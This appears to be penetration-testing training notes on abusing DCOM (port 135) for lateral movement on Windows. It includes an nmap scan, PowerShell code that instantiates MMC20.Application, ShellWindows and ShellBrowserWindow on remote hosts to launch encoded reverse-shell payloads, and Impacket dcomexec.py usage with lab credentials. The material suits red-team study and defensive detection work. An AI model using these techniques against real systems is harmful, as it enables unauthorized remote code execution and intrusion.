135 - DCOM

Distributed Component Object Model (DCOM) is a Microsoft technology that allows software components to communicate across different computers on a network. It extends the Component Object Model (COM) to support remote communication. DCOM runs on top of the RPC protocol over TCP/IP. It first connects over port 135, then switches to dynamically assigned high ports (typically 49152–65535) for further communication.

DCOM objects are identified and configured through the Windows registry. Each object is linked to several key identifiers:

• CLSID (Class Identifier) is a unique GUID that points to the object’s implementation.

• ProgID (Programmatic Identifier) is an optional, user-friendly name for the object.

• AppID (Application Identifier) defines configuration settings such as authentication and remote access permissions for one or more COM objects.

To use DCOM for lateral movement, the attacker must have the required permissions. This usually includes local or network access and membership in groups such as Distributed COM Users or Administrators. These permissions can be configured through the DCOM Configuration tool (dcomcnfg), Group Policy, or the Windows registry.

Enumeration

$ nmap -p135,49152-65535 10.129.229.244 -A

Lateral Movement

Windows

MMC20.Application

OPSEC → Execution of mmc.exe through COM is highly unusual.

The MMC20.Application object allows remote interaction with Microsoft Management Console (MMC). This enables attackers to execute commands and perform administrative tasks through its GUI components.

# Create an instance of the MMC20.Application object on SVR02 (pivot host)
$mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","172.10.10.25"));

The ExecuteShellCommand function comes from the Document.ActiveView property. The WindowState parameter specifies whether a window is minimized, maximized, or restored.

# ExecuteShellCommand parameters
View.ExecuteShellCommand( _
  ByVal Command As String, _ # Command to execute -> powershell.exe
  ByVal Directory As String, _ # Directory -> NULL
  ByVal Parameters As String, _ # PowerShell's parameters
  ByVal WindowState As String _ # PowerShell's WindowState
)

# Execute the command via MMC, in this case a reverse shell payload
$mmc.Document.ActiveView.ExecuteShellCommand("powershell.exe",$null,"-e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==",0)

ShellWindows & ShellBrowserWindow

ShellWindows and ShellBrowserWindow objects allow remote interaction with Windows Explorer sessions. ShellWindows can enumerate and control open Explorer windows, enabling file access and command execution, while ShellBrowserWindow provides more specific control over Explorer browser windows and file operations.

Because these objects do not have a ProgID, we must use their CLSID to create them remotely.

# Enumerate the object's CLSID
Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID' | ForEach-Object{Get-ItemProperty -Path$_.PSPath | Where-Object {$_.'(default)' -eq 'ShellWindows'} | Select-Object -ExpandProperty PSChildName}
# {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

# Instantiate the ShellBrowserWindow object (using its CLSID)
$shell = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","SRV02"))
# Instantiate the ShellWindows object (using its CLSID)
$shell = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","172.20.0.52"))

# Execute a command, in this case a revshell payload
$shell[0].Document.Application.ShellExecute("cmd.exe","/c powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==","C:\Windows\System32",$null,0)

Linux

If the TCP port 445 is unavailable, use -no-output → it won’t try to retrieve the output via the ADMIN$ share.

The dcomexec.py script provides RCE on Windows systems using DCOM. It works similarly to WMI-based tools but uses different DCOM endpoints. It communicates over TCP port 445 and retrieves output through the ADMIN$ share. This tool supports objects such as MMC20.Application, ShellWindows, and ShellBrowserWindow.

# Execute a command via DCOM, in this case a revshell payload using the MMC20 method
dcomexec.py -object MMC20 INLANEFREIGHT/Josias:Jonny25@172.20.0.52 "powershell -e JABjAGwAaQBlAG...SNIP...A